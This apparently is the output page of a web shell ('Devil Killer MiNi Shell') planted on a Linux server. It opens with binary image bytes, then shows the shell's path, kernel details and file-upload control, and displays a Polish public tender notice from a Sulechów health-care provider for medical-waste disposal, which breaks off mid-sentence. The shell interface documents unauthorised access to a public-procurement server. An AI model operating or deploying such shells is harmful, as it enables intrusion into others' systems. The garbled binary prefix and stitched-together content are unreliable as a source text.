JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241212/0065048801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sukcesywne usługi odbioru, transportu i unieszkodliwienia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Sulechowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000310396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zwycięstwa, 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sulechów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">spzoz@spzozsulechow.med.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://spzozsulechow.med.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne usługi odbioru, transportu i unieszkodliwienia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3e1b2b3d-7795-4803-ab65-28f10489ecce</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00650488</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00207422/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Odbiór, transport wraz z załadunkiem i rozładunkiem oraz unieszkodliwianie (utylizacja) odpadów medycznych dla potrzeb SP ZOZ w Sulechowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3e1b2b3d-7795-4803-ab65-28f10489ecce <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim.<br/>2. Komunikacja między Zamawiającym a Wykonawcami, w tym składanie ofert, wszelkich oświadczeń, wniosków, zawiadomień oraz<br/>informacji, odbywa się przy użyciu Platformy e-zamówienia, zwanej da-lej Platformą, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl. Zamawiający dopuszcza również alternatywny sposób komunikacji za pomocą poczty elektronicznej pod<br/>adresem: j.piotrowska@spzozsulechow.med.pl jednakże ta forma komunikacji nie dotyczy składania ofert.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy określa Regulamin<br/>Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce<br/>„Centrum Pomocy”.<br/>6. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań. Formularze do komunikacji umożliwiają<br/>również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>7. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie oraz zalogowania się na Platformie. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań<br/>dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie.<br/>12. Wszystkie wysłane i odebrane przez Wykonawcę wiadomości, za pomocą Platformy, w postępowaniu widoczne są po<br/>zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>13. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>17. Oferta i oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe oraz inne dokumenty i<br/>oświadczenia, o których mowa w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy<br/>składa się w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>18. Wykonawca podpisując podpisem elektronicznym ofertę oraz inne dokumenty przekazywane za-mawiającemu może zastosować<br/>podpis zarówno w formacie pliku XAdES (typ zewnętrzny) jak i w for-macie pliku PAdES.<br/>W przypadku podpisu dokonanego w formacie pliku XAdES format .xml dokumentu musi być przechowywany i przekazywany dalej<br/>z plikiem źródłowym zawierającym dane. Konieczne jest wysłanie pary plików: źródłowego i podpisanego. Przekazanie pliku z<br/>danymi bez pliku z podpisem jest równo-znaczne ze złożeniem niepodpisanych dokumentów. W przypadku użycia formatu PAdES<br/>otaczający podpis zawarty jest w jednym pliku stanowiącym dokument podpisywany. Dokumenty w formacie .pdf zaleca się<br/>podpisywać formatem PAdES.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych jest Samodzielny Publiczny Zakład Opieki<br/>Zdrowotnej w Sule-chowie, którego reprezentuje Wiesław Wojciech Świtała – Dyrektor. Kontakt z nim możliwy jest:<br/>- drogą korespondencyjną: ul. Zwycięstwa 1, 66-100 Sulechów,<br/>- drogą mailową: spzoz@spzozsulechow.med.pl,<br/>- telefonicznie: 797 606 252, 797 602 253.<br/>2. OSOBA KONTAKTOWA DS. PRZETWARZANIA DANYCH OSOBOWYCH I JEJ DANE KONTAKTOWE<br/>Inspektor Ochrony Danych, z którym kontakt możliwy jest:<br/>- drogą korespondencyjną: ul. Zwycięstwa 1, 66-100 Sulechów,<br/>- drogą mailową: iod@spzozsulechow.med.pl.<br/>3. CEL PRZETWARZANIA DANYCH OSOBOWYCH I PODSTAWA PRAWNA PRZETWARZANIA DANYCH OSOBOWYCH<br/>Cel:<br/>- przeprowadzenie postępowania o udzielenie zamówienia publicznego.<br/>Podstawa prawna:<br/>- przepis prawa, w oparciu o który realizujemy nasze obowiązki prawne i uprawnienia (art. 6 ust. 1 lit. c rozporządzenia 2016/679*,<br/>przepisy ustawy o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych, ustawy o działalności leczniczej, ustawy<br/>Prawo zamówień publicznych, ustawy o finansach publicznych, ustawy Ordynacja podatkowa, ustawy o rachunkowości).<br/>Cel:<br/>- archiwizowanie dokumentacji.<br/>Podstawa prawna:<br/>- przepis prawa, w oparciu o który realizujemy nasze obowiązki prawne (art. 6 ust. 1 lit. c rozporządze-nia 2016/679, przepisy ustawy<br/>o narodowym zasobie archiwalnym i archiwach).<br/>4. OBOWIĄZEK PODANIA DANYCH OSOBOWYCH:<br/>Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy<br/>z dnia 29 stycznia 2004 r. Prawo zamówień publicznych związanym z udziałem w postępowaniu o udzie-lenie zamówienia<br/>publicznego. Konsekwencje niepodania określonych danych wynikają z tej ustawy. Niepodanie danych może skutkować brakiem<br/>możliwości wzięcia udziału w postępowaniu.<br/>5. ODBIORCY DANYCH OSOBOWYCH<br/>Odbiorcą Twoich danych osobowych mogą być:<br/>- podmioty upoważnione na podstawie przepisów prawa, w tym organy ścigania (jak Policja i Prokura-tura), sądy, podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o prze-pisy ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień<br/>publicznych, Prezes Urzędu Zamówień Pu-blicznych, Krajowa Izba Odwoławcza;<br/>- podmioty, które na podstawie odrębnie zawartych umów współpracują z nami, dostawcy usług zao-patrujących nas w rozwiązania<br/>techniczne, organizacyjne i informatyczne, w tym umożliwiające nam zarządzanie i funkcjonowanie;<br/>- audytorzy, kontrolerzy lub podmioty upoważnione z mocy przepisów prawa do dokonywania kontro-li;<br/>- dostawcy usług pocztowych lub kurierskich;<br/>- kancelarie prawne współpracujące z nami.<br/>6. SPRZECIW WOBEC PRZETWARZANIA DANYCH OSOBOWYCH<br/>Wykonawcy nie przysługuje prawo wniesienia sprzeciwu na podstawie art. 21 rozporządzenia 2016/679, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest niezbędność do realizacji obowiązków prawnych<br/>ciążących na nas, a więc art. 6 ust. 1 lit. c rozporządzenia 2016/679.<br/>7. TWOJE UPRAWNIENIA W ZWIĄZKU Z PRZETWARZANIEM TWOICH DANYCH OSOBOWCH<br/>Przysługuje Ci prawo:<br/>- dostępu do swoich danych osobowych na podstawie art. 15 rozporządzenia 2016/679 [1] oraz otrzy-mania ich kopii;<br/>- sprostowania i uzupełnienia swoich danych osobowych na podstawie art. 16 rozporządzenia 2016/679 [2];<br/>- żądania ograniczenia przetwarzania swoich danych osobowych z zastrzeżeniem przypadków, o któ-rych mowa w art. 18 ust. 1 i 2<br/>rozporządzenia 2016/679 [3];<br/>Nie przysługuje Ci prawo:<br/>- usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia 2016/679;<br/>- przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679.<br/>Powyższe prawa mogą podlegać ograniczeniu. Ograniczenia w realizowaniu praw wynikają z regulacji wprowadzonych<br/>obowiązującymi przepisami prawa. W celu skorzystania z powyższych praw należy skontaktować się z Administratorem Danych<br/>Osobowych lub Inspektorem Ochrony Danych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8. SKARGA NA PRZETWARZANIE DANYCH OSOBOWYCH<br/>KLAUZULA INFORMACYJNA DOTYCZĄCA PRZETWARZANIA DANYCH OSOBOWYCH DLA UCZESTNIKÓW POSTĘPOWANIA<br/>O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO<br/>Na przetwarzanie danych osobowych możesz wnieść skargę do organu nadzorczego, tj. Prezesa Urzę-du Ochrony Danych<br/>Osobowych (Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa).<br/>9. PROFILOWANIE DANYCH OSOBOWYCH<br/>Nie podejmujemy decyzji opartej wyłącznie o zautomatyzowane przetwarzanie Twoich danych oso-bowych, w tym profilowanie.<br/>10. TRANSFER DANYCH POZA EUROPEJSKI OBSZAR GOSPODARCZY<br/>Nie mamy zamiaru przekazywać Twoich danych osobowych do państwa trzeciego lub organizacji mię-dzynarodowej, jednakże<br/>sytuacja taka może się zdarzyć z uwagi na to, że korzystamy z usług innych dostawców w zakresie wsparcia teleinformatycznego.<br/>Jeżeli będziemy musieli przenieść Twoje dane osobowe do podmiotów spoza Europejskiego Obszaru Gospodarczego, zwanego<br/>dalej: „EOG”, wów-czas dopilnujemy, aby istniały specjalne zabezpieczenia i aby zapewnionych został odpowiedni poziom ochrony<br/>danych. Możliwe jest przekazanie Twoich danych do państwa trzeciego w sytuacji, gdy admi-nistrator poczty e-mail, z której<br/>korzystasz w kontaktach z nami, korzysta z serwerów zlokalizowanych fizycznie poza EOG.<br/>11. OKRES PRZECHOWYWANIA DANYCH OSOBOWYCH<br/>Twoje dane osobowe są przechowywane przez okres:<br/>- niezbędny do realizacji celów przetwarzania danych osobowych;<br/>- trwania łączącej nas umowy;<br/>- przedawnienia ewentualnych roszczeń, w tym cywilnoprawnych z tym związanych;<br/>- wymagany przepisami prawa dla zamówień innych niż na udzielanie świadczeń zdrowotnych – 4 lata, licząc od końca roku w<br/>którym zakończono postępowanie o udzielenie zamówienia, a jeżeli czas trwa-nia umowy przekracza 4 lata okres przechowywana<br/>obejmuje cały czas trwania umowy, chyba że prze-pisy szczególne stanowią inaczej;<br/>- wymagany przepisami prawa, w tym dla przechowywania dokumentacji rozliczeniowej, w szczegól-ności: 5 lat, licząc od końca<br/>roku, w którym uzyskano dane oraz w którym nastąpiło wygaśnięcie umowy lub w którym upłynął termin zobowiązania podatkowego;<br/>- wymagany w odrębnych przepisach prawa do realizacji zadań wynikających z celów archiwalnych, w tym podyktowany ustawą z<br/>dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach oraz w oparciu o Jednolity Rzeczowy Wykaz Akt obowiązujący u<br/>nas.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.382.14.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są: Sukcesywne usługi odbioru, transportu i unieszkodliwienia odpadów medycznych.<br/>2. Szczegółowy opis przedmiotu zamówienia zawarty został w załączniku nr 2 do SWZ Formularz cenowo-techniczny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90524000-6 - Usługi w zakresie odpadów medycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513300-9 - Usługi spalania odpadów</p> <p class="mb-0">90524200-8 - Usługi usuwania odpadów szpitalnych</p> <p class="mb-0">90524400-0 - Usługi gromadzenia, transportu i wywozu odpadów szpitalnych</p> <p class="mb-0">33190000-8 - Różne urządzenia i produkty medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami:<br/>Cena ofertowa = 100 pkt.<br/>2. Sposób oceny ofert:<br/>Wartość punktowa zostanie ustalona na podstawie następujących obliczeń:<br/>2.1. Składnik A – dotyczy kryterium „Cena ofertowa” (maksymalna ilość punktów jaką można uzyskać<br/>w kryterium wynosi 100 punktów)<br/> najniższa cena oferty<br/>Wartość punktowa składnika A = ------------------------------------ x 100 pkt<br/> cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów. Zamawiający wyznacza szczegółowy warunek w tym zakresie. Zamawiający uzna warunek za spełniony jeżeli<br/>Wykonawca wykaże, że:<br/>Posiada aktualne zezwolenia /decyzje na prowadzenie działalności gospodarczej w zakresie odbioru, transportu i<br/>unieszkodliwiania, zgodnie z wymogami Ustawy z dnia 14 grudnia 2012 r. o odpadach oraz przepisami wykonawczymi do<br/>ustawy: Zezwolenie / decyzja musi być wydana przez właściwy terytorialnie organ i uprawniać Wykonawcę do prowadzenia<br/>działalności gospodarczej w zakresie odbioru, transportu i unieszkodliwiania odpadów o kodach określonych w niniejszej<br/>SWZ; alternatywnie - w zakresie transportu: dokument potwierdzający dokonanie wpisu do Bazy danych o produktach i<br/>opakowaniach oraz o gospodarce odpadami - BDO (zgodnie z ustawą z dnia 14 grudnia 2012 r.o odpadach) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający, przed<br/>udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień składania, tj.<br/>4.1. Na potwierdzenie braku podstaw wykluczenia z postępowania o udzielenie zamówienia oświadczenia Wykonawcy, o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z<br/>postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1,<br/>b) art. 109 ust. 1 pkt 4 ustawy.<br/>c) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. (Dz. U. 2022 poz. 835) o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego -załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualne<br/>zezwolenie /decyzja wydane/a przez właściwy terytorialnie organ i uprawniające/a Wykonawcę do prowadzenia działalności<br/>gospodarczej w zakresie odbioru, transportu i unieszkodliwiania odpadów o kodach określonych w niniejszej SWZ; alternatywnie - w<br/>zakresie transportu: dokument potwierdzający dokonanie wpisu do Bazy danych o produktach i opakowaniach oraz o gospodarce<br/>odpadami - BDO (zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach) (na potwierdzenie spełnienia przez Wykonawcę warunku<br/>udziału w postępowaniu w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, opisanego w<br/>Rozdziale V Pkt. 3.2).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2.1. Formularz oferty – załącznik nr 1 do SWZ<br/>2.2. Formularz cenowo-techniczny – załącznik nr 2 do SWZ.<br/>Każdy Wykonawca może złożyć tylko jedną ofertę. Ofertę należy sporządzić zgodnie z wymogami SWZ.<br/>Do oferty należy dołączyć:<br/>3.1. Oświadczenie o braku podstaw wykluczenia stanowiące – załącznik nr 3 do SWZ. Oświadczenie, o którym mowa,<br/>stanowi dowód potwierdzający brak podstaw wykluczenia na dzień składania ofert, tymczasowo zastępujący wymagane<br/>przez zamawiającego podmiotowe środki dowodowe.<br/>W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia ww. oświadczenie składa każdy z<br/>wykonawców składających ofertę wspólną.<br/>3.2. Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest 